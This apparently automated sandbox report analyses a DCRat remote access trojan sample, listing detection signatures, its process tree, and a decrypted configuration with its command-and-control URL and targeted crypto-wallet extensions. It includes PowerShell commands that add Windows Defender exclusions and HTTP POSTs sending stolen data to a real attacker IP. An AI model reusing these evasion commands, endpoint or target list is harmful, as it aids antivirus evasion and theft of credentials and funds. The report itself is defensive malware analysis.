Windows Analysis Report
zZ1Y43bxxV.exe

Overview

General Information

Sample name: zZ1Y43bxxV.exe (renamed because original name is a hash value)
Original sample name: cdac978772a7616686c0efe2727ce902.exe
Analysis ID: 1583651
MD5: cdac978772a7616686c0efe2727ce902
SHA1: b316852fe5b1c54c61ffefac1bc9032091d26cb0
SHA256: fcfb73997e95a7b8dfd22e302a1b18f8c7075a127bf33f7c9d8bc203984bcdf6
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Drops executable to a common third party application directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • zZ1Y43bxxV.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\zZ1Y43bxxV.exe" MD5: CDAC978772A7616686C0EFE2727CE902)
    • powershell.exe (PID: 6036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2916 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4956 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7360 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • wnWNWNYIxJtFiUSDRXunzX.exe (PID: 7744 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe" MD5: CDAC978772A7616686C0EFE2727CE902)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
zZ1Y43bxxV.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Users\Public\UserOOBEBroker.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: zZ1Y43bxxV.exe PID: 6164 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.0.zZ1Y43bxxV.exe.d0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

                          System Summary

                          Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zZ1Y43bxxV.exe", ParentImage: C:\Users\user\Desktop\zZ1Y43bxxV.exe, ParentProcessId: 6164, ParentProcessName: zZ1Y43bxxV.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', ProcessId: 6036, ProcessName: powershell.exe
                          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zZ1Y43bxxV.exe", ParentImage: C:\Users\user\Desktop\zZ1Y43bxxV.exe, ParentProcessId: 6164, ParentProcessName: zZ1Y43bxxV.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', ProcessId: 6036, ProcessName: powershell.exe
                          Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2025-01-03T09:07:14.471923+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 86.110.194.28 | 80 | TCP

                          AV Detection

                          Source: zZ1Y43bxxV.exe, Avira: detected
                          Source: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php, Avira URL Cloud: Label: malware
                          Source: C:\Users\Public\UserOOBEBroker.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\GmBsEsrN.log, Avira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat, Avira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\CqMurJJc.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\Users\user\Desktop\ASylWHNt.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: zZ1Y43bxxV.exe, Malware Configuration Extractor: DCRat {"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, ReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, ReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, ReversingLabs: Detection: 78%
                          Source: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe, ReversingLabs: Detection: 78%
                          Source: C:\Users\Public\UserOOBEBroker.exe, ReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\ASylWHNt.log, ReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\BtlmWJui.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\CqMurJJc.log, ReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\CzktcvcZ.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\EBWcxehU.log, ReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\EfGUsIxp.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\GmBsEsrN.log, ReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\HQmkzWIi.log, ReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\QMyIEiey.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\UhMZMMnD.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\VDeRaRWG.log, ReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\aEoYYxCd.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\bfAYobhs.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\cNtGaFop.log, ReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\eYPHaYTq.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\fijXRHyU.log, ReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\iGWfDlte.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\iOGyhUTj.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\lJFefRJG.log, ReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\nUbffkpH.log, ReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\vYOmNlRn.log, ReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\voDmexRC.log, ReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\wGHUzQXl.log, ReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\zeucltSv.log, ReversingLabs: Detection: 50%
                          Source: zZ1Y43bxxV.exe, Virustotal: Detection: 61%
                          Source: zZ1Y43bxxV.exe, ReversingLabs: Detection: 78%
                          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\Public\UserOOBEBroker.exe, Joe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, Joe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\FpakjsdS.log, Joe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, Joe Sandbox ML: detected
                          Source: zZ1Y43bxxV.exe, Joe Sandbox ML: detected
                          Source: zZ1Y43bxxV.exeString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: zZ1Y43bxxV.exeString decryptor: ["oASNH1t456EikURI4VE901riUiT0vhqPPdrCyTnZqfd2aBLWCFEPIpvxTu3ih2IYQyTHmOTlroTUYzISW6xqdbHjs4sEaF1xXFmlsEtyvcidWbZelkLlEb5yrtZsfPLl","8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                          Source: zZ1Y43bxxV.exeString decryptor: [["http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/","processorWindowsDatalifepublic"]]
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 16_2_00007FFD9BFB367E CryptUnprotectData, 16_2_00007FFD9BFB367E
                          Source: zZ1Y43bxxV.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, Directory created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, Directory created: C:\Program Files\Internet Explorer\a903aeb2e41cb9
                          Source: zZ1Y43bxxV.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.logat source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2901730818.0000000000F96000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, File opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe, Code function: 4x nop then jmp 00007FFD9B8BDFC6h, 0_2_00007FFD9B8BDDAD
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 4x nop then jmp 00007FFD9B8ADFC6h, 16_2_00007FFD9B8ADDAD
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 4x nop then jmp 00007FFD9BE7C99Bh, 16_2_00007FFD9BE7C688
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 4x nop then jmp 00007FFD9BFB2B29h, 16_2_00007FFD9BFB2869
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 4x nop then jmp 00007FFD9BFB2B29h, 16_2_00007FFD9BFB2A28
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe, Code function: 4x nop then jmp 00007FFD9BFB2B29h, 16_2_00007FFD9BFB2A38

                          Networking

                          Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 86.110.194.28:80
                          Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox View, ASN Name: RACKTECHRU RACKTECHRU
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 384 | Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 2576 | Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 1452 | Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 2568 | Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 2052 | Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 2576 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 86.110.194.28 | Content-Length: 2052 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2060 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 188810 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2164 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2140 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2564 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2564 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 86.110.194.28 Content-Length: 2152 Expect: 100-continue Connection: Keep-Alive
